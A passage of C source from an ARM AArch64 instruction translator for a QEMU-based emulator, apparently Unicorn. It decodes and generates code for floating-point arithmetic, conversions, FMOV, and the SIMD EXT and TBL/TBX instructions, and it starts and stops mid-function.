fpst); gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_res); break; } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point data-processing (2 source) - double precision */ static void handle_fp_2src_double(DisasContext *s, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_op1; TCGv_i64 tcg_op2; TCGv_i64 tcg_res; TCGv_ptr fpst; tcg_res = tcg_temp_new_i64(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_dreg(s, rn); tcg_op2 = read_fp_dreg(s, rm); switch (opcode) { case 0x0: /* FMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FDIV */ gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2: /* FADD */ gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FSUB */ gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FMAX */ gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5: /* FMIN */ gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAXNM */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FMINNM */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x8: /* FNMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_res); break; } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* Floating-point data-processing (2 source) - half precision */ static void handle_fp_2src_half(DisasContext *s, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1; TCGv_i32 tcg_op2; TCGv_i32 tcg_res; TCGv_ptr fpst; tcg_res = tcg_temp_new_i32(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, true); tcg_op1 = read_fp_hreg(s, rn); tcg_op2 = read_fp_hreg(s, rm); switch (opcode) { case 0x0: /* FMUL */ gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FDIV */ gen_helper_advsimd_divh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2: /* FADD */ gen_helper_advsimd_addh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FSUB */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FMAX */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5: /* FMIN */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAXNM */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FMINNM */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x8: /* FNMUL */ gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_res, 0x8000); break; default: g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating point data-processing (2 source) * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+--------+-----+------+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | opcode | 1 0 | Rn | Rd | * +---+---+---+-----------+------+---+------+--------+-----+------+------+ */ static void disas_fp_2src(DisasContext *s, uint32_t insn) { int mos = extract32(insn, 29, 3); int type = extract32(insn, 22, 2); int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int opcode = extract32(insn, 12, 4); if (opcode > 8 || mos) { unallocated_encoding(s); return; } switch (type) { case 0: if (!fp_access_check(s)) { return; } handle_fp_2src_single(s, opcode, rd, rn, rm); break; case 1: if (!fp_access_check(s)) { return; } handle_fp_2src_double(s, opcode, rd, rn, rm); break; case 3: if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_2src_half(s, opcode, rd, rn, rm); break; default: unallocated_encoding(s); } } /* Floating-point data-processing (3 source) - single precision */ static void handle_fp_3src_single(DisasContext *s, bool o0, bool o1, int rd, int rn, int rm, int ra) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1, tcg_op2, tcg_op3; TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_sreg(s, rn); tcg_op2 = read_fp_sreg(s, rm); tcg_op3 = read_fp_sreg(s, ra); /* These are fused multiply-add, and must be done as one * floating point operation with no rounding between the * multiplication and addition steps. * NB that doing the negations here as separate steps is * correct : an input NaN should come out with its sign bit * flipped if it is a negated-input. */ if (o1 == true) { gen_helper_vfp_negs(tcg_ctx, tcg_op3, tcg_op3); } if (o0 != o1) { gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1); } gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op3); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point data-processing (3 source) - double precision */ static void handle_fp_3src_double(DisasContext *s, bool o0, bool o1, int rd, int rn, int rm, int ra) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_op1, tcg_op2, tcg_op3; TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_dreg(s, rn); tcg_op2 = read_fp_dreg(s, rm); tcg_op3 = read_fp_dreg(s, ra); /* These are fused multiply-add, and must be done as one * floating point operation with no rounding between the * multiplication and addition steps. * NB that doing the negations here as separate steps is * correct : an input NaN should come out with its sign bit * flipped if it is a negated-input. */ if (o1 == true) { gen_helper_vfp_negd(tcg_ctx, tcg_op3, tcg_op3); } if (o0 != o1) { gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1); } gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); write_fp_dreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_op3); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* Floating-point data-processing (3 source) - half precision */ static void handle_fp_3src_half(DisasContext *s, bool o0, bool o1, int rd, int rn, int rm, int ra) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1, tcg_op2, tcg_op3; TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, true); tcg_op1 = read_fp_hreg(s, rn); tcg_op2 = read_fp_hreg(s, rm); tcg_op3 = read_fp_hreg(s, ra); /* These are fused multiply-add, and must be done as one * floating point operation with no rounding between the * multiplication and addition steps. * NB that doing the negations here as separate steps is * correct : an input NaN should come out with its sign bit * flipped if it is a negated-input. */ if (o1 == true) { tcg_gen_xori_i32(tcg_ctx, tcg_op3, tcg_op3, 0x8000); } if (o0 != o1) { tcg_gen_xori_i32(tcg_ctx, tcg_op1, tcg_op1, 0x8000); } gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op3); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating point data-processing (3 source) * 31 30 29 28 24 23 22 21 20 16 15 14 10 9 5 4 0 * +---+---+---+-----------+------+----+------+----+------+------+------+ * | M | 0 | S | 1 1 1 1 1 | type | o1 | Rm | o0 | Ra | Rn | Rd | * +---+---+---+-----------+------+----+------+----+------+------+------+ */ static void disas_fp_3src(DisasContext *s, uint32_t insn) { int mos = extract32(insn, 29, 3); int type = extract32(insn, 22, 2); int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int ra = extract32(insn, 10, 5); int rm = extract32(insn, 16, 5); bool o0 = extract32(insn, 15, 1); bool o1 = extract32(insn, 21, 1); if (mos) { unallocated_encoding(s); return; } switch (type) { case 0: if (!fp_access_check(s)) { return; } handle_fp_3src_single(s, o0, o1, rd, rn, rm, ra); break; case 1: if (!fp_access_check(s)) { return; } handle_fp_3src_double(s, o0, o1, rd, rn, rm, ra); break; case 3: if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_3src_half(s, o0, o1, rd, rn, rm, ra); break; default: unallocated_encoding(s); } } /* Floating point immediate * 31 30 29 28 24 23 22 21 20 13 12 10 9 5 4 0 * +---+---+---+-----------+------+---+------------+-------+------+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | imm8 | 1 0 0 | imm5 | Rd | * +---+---+---+-----------+------+---+------------+-------+------+------+ */ static void disas_fp_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int imm5 = extract32(insn, 5, 5); int imm8 = extract32(insn, 13, 8); int type = extract32(insn, 22, 2); int mos = extract32(insn, 29, 3); uint64_t imm; TCGv_i64 tcg_res; MemOp sz; if (mos || imm5) { unallocated_encoding(s); return; } switch (type) { case 0: sz = MO_32; break; case 1: sz = MO_64; break; case 3: sz = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } imm = vfp_expand_imm(sz, imm8); tcg_res = tcg_const_i64(tcg_ctx, imm); write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* Handle floating point <=> fixed point conversions. Note that we can * also deal with fp <=> integer conversions as a special case (scale == 64) * OPTME: consider handling that special case specially or at least skipping * the call to scalbn in the helpers for zero shifts. */ static void handle_fpfpcvt(DisasContext *s, int rd, int rn, int opcode, bool itof, int rmode, int scale, int sf, int type) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_signed = !(opcode & 1); TCGv_ptr tcg_fpstatus; TCGv_i32 tcg_shift, tcg_single; TCGv_i64 tcg_double; tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, type == 3); tcg_shift = tcg_const_i32(tcg_ctx, 64 - scale); if (itof) { TCGv_i64 tcg_int = cpu_reg(s, rn); if (!sf) { TCGv_i64 tcg_extend = new_tmp_a64(s); if (is_signed) { tcg_gen_ext32s_i64(tcg_ctx, tcg_extend, tcg_int); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_extend, tcg_int); } tcg_int = tcg_extend; } switch (type) { case 1: /* float64 */ tcg_double = tcg_temp_new_i64(tcg_ctx); if (is_signed) { gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int, tcg_shift, tcg_fpstatus); } write_fp_dreg(s, rd, tcg_double); tcg_temp_free_i64(tcg_ctx, tcg_double); break; case 0: /* float32 */ tcg_single = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_sqtos(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_uqtos(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } write_fp_sreg(s, rd, tcg_single); tcg_temp_free_i32(tcg_ctx, tcg_single); break; case 3: /* float16 */ tcg_single = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_sqtoh(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_uqtoh(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } write_fp_sreg(s, rd, tcg_single); tcg_temp_free_i32(tcg_ctx, tcg_single); break; default: g_assert_not_reached(); } } else { TCGv_i64 tcg_int = cpu_reg(s, rd); TCGv_i32 tcg_rmode; if (extract32(opcode, 2, 1)) { /* There are too many rounding modes to all fit into rmode, * so FCVTA[US] is a special case. */ rmode = FPROUNDING_TIEAWAY; } tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); switch (type) { case 1: /* float64 */ tcg_double = read_fp_dreg(s, rn); if (is_signed) { if (!sf) { gen_helper_vfp_tosld(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_tosqd(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } } else { if (!sf) { gen_helper_vfp_tould(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touqd(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } } if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_int, tcg_int); } tcg_temp_free_i64(tcg_ctx, tcg_double); break; case 0: /* float32 */ tcg_single = read_fp_sreg(s, rn); if (sf) { if (is_signed) { gen_helper_vfp_tosqs(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touqs(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } } else { TCGv_i32 tcg_dest = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_tosls(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touls(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } tcg_gen_extu_i32_i64(tcg_ctx, tcg_int, tcg_dest); tcg_temp_free_i32(tcg_ctx, tcg_dest); } tcg_temp_free_i32(tcg_ctx, tcg_single); break; case 3: /* float16 */ tcg_single = read_fp_sreg(s, rn); if (sf) { if (is_signed) { gen_helper_vfp_tosqh(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touqh(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } } else { TCGv_i32 tcg_dest = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_toslh(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_toulh(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } tcg_gen_extu_i32_i64(tcg_ctx, tcg_int, tcg_dest); tcg_temp_free_i32(tcg_ctx, tcg_dest); } tcg_temp_free_i32(tcg_ctx, tcg_single); break; default: g_assert_not_reached(); } gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); } /* Floating point <-> fixed point conversions * 31 30 29 28 24 23 22 21 20 19 18 16 15 10 9 5 4 0 * +----+---+---+-----------+------+---+-------+--------+-------+------+------+ * | sf | 0 | S | 1 1 1 1 0 | type | 0 | rmode | opcode | scale | Rn | Rd | * +----+---+---+-----------+------+---+-------+--------+-------+------+------+ */ static void disas_fp_fixed_conv(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int scale = extract32(insn, 10, 6); int opcode = extract32(insn, 16, 3); int rmode = extract32(insn, 19, 2); int type = extract32(insn, 22, 2); bool sbit = extract32(insn, 29, 1); bool sf = extract32(insn, 31, 1); bool itof; if (sbit || (!sf && scale < 32)) { unallocated_encoding(s); return; } switch (type) { case 0: /* float32 */ case 1: /* float64 */ break; case 3: /* float16 */ if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } switch ((rmode << 3) | opcode) { case 0x2: /* SCVTF */ case 0x3: /* UCVTF */ itof = true; break; case 0x18: /* FCVTZS */ case 0x19: /* FCVTZU */ itof = false; break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fpfpcvt(s, rd, rn, opcode, itof, FPROUNDING_ZERO, scale, sf, type); } static void handle_fmov(DisasContext *s, int rd, int rn, int type, bool itof) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* FMOV: gpr to or from float, double, or top half of quad fp reg, * without conversion. */ if (itof) { TCGv_i64 tcg_rn = cpu_reg(s, rn); TCGv_i64 tmp; switch (type) { case 0: /* 32 bit */ tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, tmp, tcg_rn); write_fp_dreg(s, rd, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; case 1: /* 64 bit */ write_fp_dreg(s, rd, tcg_rn); break; case 2: /* 64 bit to top half. */ tcg_gen_st_i64(tcg_ctx, tcg_rn, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd)); clear_vec_high(s, true, rd); break; case 3: /* 16 bit */ tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16u_i64(tcg_ctx, tmp, tcg_rn); write_fp_dreg(s, rd, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; default: g_assert_not_reached(); } } else { TCGv_i64 tcg_rd = cpu_reg(s, rd); switch (type) { case 0: /* 32 bit */ tcg_gen_ld32u_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_32)); break; case 1: /* 64 bit */ tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_64)); break; case 2: /* 64 bits from top half */ tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rn)); break; case 3: /* 16 bit */ tcg_gen_ld16u_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_16)); break; default: g_assert_not_reached(); } } } static void handle_fjcvtzs(DisasContext *s, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t = read_fp_dreg(s, rn); TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, false); gen_helper_fjcvtzs(tcg_ctx, t, t, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); tcg_gen_ext32u_i64(tcg_ctx, cpu_reg(s, rd), t); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, t); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_NF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); tcg_temp_free_i64(tcg_ctx, t); } /* Floating point <-> integer conversions * 31 30 29 28 24 23 22 21 20 19 18 16 15 10 9 5 4 0 * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ * | sf | 0 | S | 1 1 1 1 0 | type | 1 | rmode | opc | 0 0 0 0 0 0 | Rn | Rd | * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ */ static void disas_fp_int_conv(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 16, 3); int rmode = extract32(insn, 19, 2); int type = extract32(insn, 22, 2); bool sbit = extract32(insn, 29, 1); bool sf = extract32(insn, 31, 1); bool itof = false; if (sbit) { goto do_unallocated; } switch (opcode) { case 2: /* SCVTF */ case 3: /* UCVTF */ itof = true; /* fallthru */ case 4: /* FCVTAS */ case 5: /* FCVTAU */ if (rmode != 0) { goto do_unallocated; } /* fallthru */ case 0: /* FCVT[NPMZ]S */ case 1: /* FCVT[NPMZ]U */ switch (type) { case 0: /* float32 */ case 1: /* float64 */ break; case 3: /* float16 */ if (!dc_isar_feature(aa64_fp16, s)) { goto do_unallocated; } break; default: goto do_unallocated; } if (!fp_access_check(s)) { return; } handle_fpfpcvt(s, rd, rn, opcode, itof, rmode, 64, sf, type); break; default: switch (sf << 7 | type << 5 | rmode << 3 | opcode) { case 0x66: // 0b01100110: /* FMOV half <-> 32-bit int */ case 0x67: // 0b01100111: case 0xe6: // 0b11100110: /* FMOV half <-> 64-bit int */ case 0xe7: // 0b11100111: if (!dc_isar_feature(aa64_fp16, s)) { goto do_unallocated; } /* fallthru */ case 6: // 0b00000110: /* FMOV 32-bit */ case 7: // 0b00000111: case 0xa6: // 0b10100110: /* FMOV 64-bit */ case 0xa7: // 0b10100111: case 0xce: // 0b11001110: /* FMOV top half of 128-bit */ case 0xcf: // 0b11001111: if (!fp_access_check(s)) { return; } itof = opcode & 1; handle_fmov(s, rd, rn, type, itof); break; case 0x3e: // 0b00111110: /* FJCVTZS */ if (!dc_isar_feature(aa64_jscvt, s)) { goto do_unallocated; } else if (fp_access_check(s)) { handle_fjcvtzs(s, rd, rn); } break; default: do_unallocated: unallocated_encoding(s); return; } break; } } /* FP-specific subcases of table C3-6 (SIMD and FP data processing) * 31 30 29 28 25 24 0 * +---+---+---+---------+-----------------------------+ * | | 0 | | 1 1 1 1 | | * +---+---+---+---------+-----------------------------+ */ static void disas_data_proc_fp(DisasContext *s, uint32_t insn) { if (extract32(insn, 24, 1)) { /* Floating point data-processing (3 source) */ disas_fp_3src(s, insn); } else if (extract32(insn, 21, 1) == 0) { /* Floating point to fixed point conversions */ disas_fp_fixed_conv(s, insn); } else { switch (extract32(insn, 10, 2)) { case 1: /* Floating point conditional compare */ disas_fp_ccomp(s, insn); break; case 2: /* Floating point data-processing (2 source) */ disas_fp_2src(s, insn); break; case 3: /* Floating point conditional select */ disas_fp_csel(s, insn); break; case 0: switch (ctz32(extract32(insn, 12, 4))) { case 0: /* [15:12] == xxx1 */ /* Floating point immediate */ disas_fp_imm(s, insn); break; case 1: /* [15:12] == xx10 */ /* Floating point compare */ disas_fp_compare(s, insn); break; case 2: /* [15:12] == x100 */ /* Floating point data-processing (1 source) */ disas_fp_1src(s, insn); break; case 3: /* [15:12] == 1000 */ unallocated_encoding(s); break; default: /* [15:12] == 0000 */ /* Floating point <-> integer conversions */ disas_fp_int_conv(s, insn); break; } break; } } } static void do_ext64(DisasContext *s, TCGv_i64 tcg_left, TCGv_i64 tcg_right, int pos) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Extract 64 bits from the middle of two concatenated 64 bit * vector register slices left:right. The extracted bits start * at 'pos' bits into the right (least significant) side. * We return the result in tcg_right, and guarantee not to * trash tcg_left. */ TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); assert(pos > 0 && pos < 64); tcg_gen_shri_i64(tcg_ctx, tcg_right, tcg_right, pos); tcg_gen_shli_i64(tcg_ctx, tcg_tmp, tcg_left, 64 - pos); tcg_gen_or_i64(tcg_ctx, tcg_right, tcg_right, tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* EXT * 31 30 29 24 23 22 21 20 16 15 14 11 10 9 5 4 0 * +---+---+-------------+-----+---+------+---+------+---+------+------+ * | 0 | Q | 1 0 1 1 1 0 | op2 | 0 | Rm | 0 | imm4 | 0 | Rn | Rd | * +---+---+-------------+-----+---+------+---+------+---+------+------+ */ static void disas_simd_ext(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int is_q = extract32(insn, 30, 1); int op2 = extract32(insn, 22, 2); int imm4 = extract32(insn, 11, 4); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int pos = imm4 << 3; TCGv_i64 tcg_resl, tcg_resh; if (op2 != 0 || (!is_q && extract32(imm4, 3, 1))) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_resh = tcg_temp_new_i64(tcg_ctx); tcg_resl = tcg_temp_new_i64(tcg_ctx); /* Vd gets bits starting at pos bits into Vm:Vn. This is * either extracting 128 bits from a 128:128 concatenation, or * extracting 64 bits from a 64:64 concatenation. */ if (!is_q) { read_vec_element(s, tcg_resl, rn, 0, MO_64); if (pos != 0) { read_vec_element(s, tcg_resh, rm, 0, MO_64); do_ext64(s, tcg_resh, tcg_resl, pos); } tcg_gen_movi_i64(tcg_ctx, tcg_resh, 0); } else { TCGv_i64 tcg_hh; typedef struct { int reg; int elt; } EltPosns; EltPosns eltposns[] = { {rn, 0}, {rn, 1}, {rm, 0}, {rm, 1} }; EltPosns *elt = eltposns; if (pos >= 64) { elt++; pos -= 64; } read_vec_element(s, tcg_resl, elt->reg, elt->elt, MO_64); elt++; read_vec_element(s, tcg_resh, elt->reg, elt->elt, MO_64); elt++; if (pos != 0) { do_ext64(s, tcg_resh, tcg_resl, pos); tcg_hh = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_hh, elt->reg, elt->elt, MO_64); do_ext64(s, tcg_hh, tcg_resh, pos); tcg_temp_free_i64(tcg_ctx, tcg_hh); } } write_vec_element(s, tcg_resl, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resl); write_vec_element(s, tcg_resh, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resh); clear_vec_high(s, true, rd); } /* TBL/TBX * 31 30 29 24 23 22 21 20 16 15 14 13 12 11 10 9 5 4 0 * +---+---+-------------+-----+---+------+---+-----+----+-----+------+------+ * | 0 | Q | 0 0 1 1 1 0 | op2 | 0 | Rm | 0 | len | op | 0 0 | Rn | Rd | * +---+---+-------------+-----+---+------+---+-----+----+-----+------+------+ */ static void disas_simd_tb(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op2 = extract32(insn, 22, 2); int is_q = extract32(insn, 30, 1); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int is_tblx = extract32(insn, 12, 1); int len = extract32(insn, 13, 2); TCGv_i64 tcg_resl, tcg_resh, tcg_idx; TCGv_i32 tcg_regno, tcg_numregs; if (op2 != 0) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* This does a table lookup: for every byte element in the input * we index into a table formed from up to four vector registers, * and then the output is the result of the lookups. Our helper * function does the lookup operation for a single 64 bit part of * the input. */ tcg_resl = tcg_temp_new_i64(tcg_ctx); tcg_resh = tcg_temp_new_i64(tcg_ctx); if (is_tblx) { read_vec_element(s, tcg_resl, rd, 0, MO_64); } else { tcg_gen_movi_i64(tcg_ctx, tcg_resl, 0); } if (is_tblx && is_q) { read_vec_element(s, tcg_resh, rd, 1, MO_64); } else { tcg_gen_movi_i64(tcg_ctx, tcg_resh, 0); } tcg_idx = tcg_temp_new_i64(tcg_ctx); tcg_regno = tcg_const_i32(tcg_ctx, rn); tcg_numregs = tcg_const_i32(tcg_ctx, len + 1); read_vec_element(s, tcg_idx, rm, 0, MO_64); gen_helper_simd_tbl(tcg_ctx, tcg_resl, tcg_ctx->cpu_env, tcg_resl, tcg_idx, tcg_regno, tcg_numregs); if (is_q) { read_vec_element(s, tcg_idx, rm, 1, MO_64); gen_helper_simd_tbl(tcg_ctx, tcg_resh, tcg_ctx->cpu_env, tcg_resh, tcg_idx, tcg_regno, tcg_numregs); } tcg_temp_free_i64(tcg_ctx, tcg_idx); tcg_temp_free_i32(tcg_ctx, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_numregs); write_vec_element(s, tcg_resl, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resl); write_vec_element(s, tcg_resh, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resh); clear_vec_high(s, true, rd); } /* ZIP/UZP/TRN * 31 30 29 24 23 22 21 20 16 15 14 12 11 10 9 5 4 0 * +---+---+-------------+------+---+------+---+------------------+------+ * | 0 | Q | 0 0 1 1 1 0 | size | 0 | Rm | 0 | opc | 1 0 | Rn | Rd | * +---+---+-------------+------+---+------+---+------------------+------+ */ static void disas_simd_zip_trn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); /* opc field bits [1:0] indicate ZIP/UZP/TRN; * 